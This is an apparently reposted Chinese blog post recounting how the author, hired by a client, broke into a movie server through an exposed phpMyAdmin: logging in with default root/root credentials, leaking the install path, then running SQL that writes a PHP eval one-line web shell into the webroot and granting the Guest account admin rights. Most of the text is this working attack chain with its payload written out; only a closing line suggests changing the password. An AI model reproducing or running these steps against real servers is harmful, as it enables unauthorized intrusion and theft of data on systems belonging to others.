现在的位置: 首页 > 综合 > 正文

关于PHPMYADMIN的入侵提权拿服务器

2014年07月24日 ⁄ 综合 ⁄ 共 1268字 ⁄ 字号 评论关闭

转自:http://hi.baidu.com/0o1znz1ow/item/651d3bddbd9b7cf03cc2cb1e

作者不详

关于PHPMYADMIN的入侵提权拿服务器

1.今天收到客户一个单子,说是要黑一台电影服务器,然后给了我IP 61.147.*.*

打开网站一看,发现是用FLEAPHP写的一个程序

因为刚好在研究FLEAPHP开源开发系统,大致了解一些语法,可是没有能利用的,而且整个服务器也只有这么一个网站

2.FleaPHP 为开发者轻松、快捷的创建应用程序提供帮助。FleaPHP 框架简单、清晰,容易理解和学习,并且有完全中文化的文档和丰富的示

例程序降低学习成本。
使用 FleaPHP 框架开发的应用程序能够自动适应各种运行环境,并兼容 PHP4 和 PHP5。


3.既然是PHP那肯定有PHPMYADMIN,尝试着在网站地址后 加入 61.147.*.*/phpmyadmin

哈哈,能直接打开,这时候,就差用户名和密码了

因为事先在看网站的时候,我直接在网站地址后加了个 61.147.*.*/ROOT

没想到能查看他的目录,所以,我在 PHPMYADMIN里面就用默认用户

ROOT ROOT

成功登陆

发现他有三个数据库。。这时候就要利用到 PHPMYADMIN的入侵了

4.首先 打开phpmyadmin

http://61.147.*.*/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.

就是在PHPMYADMIN后面加 libraries/select_lang.lib.php

得到他的路径 C:APMhtdocsphpMyAdminlibraries

这个一定要记录下来

然后 进入PHPMYADMIN

用默认用户进去

运行 SQL语句

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES("<?php eval($_POST[1]);?>");
select cmd from a into outfile "C:/APM/htdocs/phpMyAdmin/libraries/d.php";
Drop TABLE IF EXISTS a;


语句详细意思

创建一个A表 写入 <?php eval($_POST[1]);?>
熟悉这个的都知道 <?php eval($_POST[1]);?>这个就是一句话了

1是密码 可以自行修改

把里面的信息输出到 phpMyAdmin/libraries/d.php
这个文件

d.php 名字也可以自己入

Drop TABLE IF EXISTS a   如果有 A表 将删除


然后执行

OK 写入成功

这个时候用一句话连接

传上SHELL

进去 一查 原来是个WIN系统

开启GUEST 给予管理权限

服务器成功到手

1.5T的电影 呵呵


此方法一是爆出了路径 二是管理员大意 没有修改默认密码

所以

漏洞详细解决方法:
就是修改管理员密码

这样 可以阻止黑客进入PHPMYADMIN进行SQL运行

当然 IDC商也要禁止客户商的一些权限

这样就可以保证了

抱歉!评论已关闭.